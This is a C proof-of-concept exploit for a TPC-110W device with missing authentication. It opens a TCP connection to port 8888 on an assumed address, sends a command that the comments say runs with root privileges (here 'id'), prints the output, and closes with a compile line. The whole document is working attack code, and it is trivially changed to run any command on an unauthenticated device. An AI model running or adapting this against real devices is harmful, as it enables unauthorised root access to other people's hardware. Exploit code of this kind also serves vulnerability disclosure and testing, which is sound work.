TPC-110W - Missing Authentication for Critical Function

1. #include <stdio.h>
2. #include <stdlib.h>
3. #include <string.h>
4. #include <sys/socket.h>
5. #include <arpa/inet.h>
6. #include <unistd.h>
7.  
8. int main(int argc, char *argv[]) {
9.     int sock;
10.     struct sockaddr_in serv_addr;
11.     char command[512];
12.  
13.     sock = socket(AF_INET, SOCK_STREAM, 0);
14.     if (sock < 0) {
15.         perror("socket");
16.         exit(1);
17.     }
18.  
19.     memset(&serv_addr, '0', sizeof(serv_addr));
20.     serv_addr.sin_family = AF_INET;
21.     serv_addr.sin_port = htons(8888); // The default port of TPC-110W is 8888
22.     if (inet_pton(AF_INET, "192.168.1.10", &serv_addr.sin_addr) <= 0) { // Assuming the device's IP address is 192.168.1.10
23.         perror("inet_pton");
24.         exit(1);
25.     }
26.  
27.     if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
28.         perror("connect");
29.         exit(1);
30.     }
31.  
32.     // Run command with root privileges
33.     snprintf(command, sizeof(command), "id\n"); // Check user id
34.     write(sock, command, strlen(command));
35.  
36.     memset(command, '0', sizeof(command));
37.     read(sock, command, sizeof(command));
38.     printf("%s\n", command);
39.  
40.     close(sock);
41.     return 0;
42. }
43.  
44. //gcc -o tpc-110w-exploit tpc-110w-exp
45.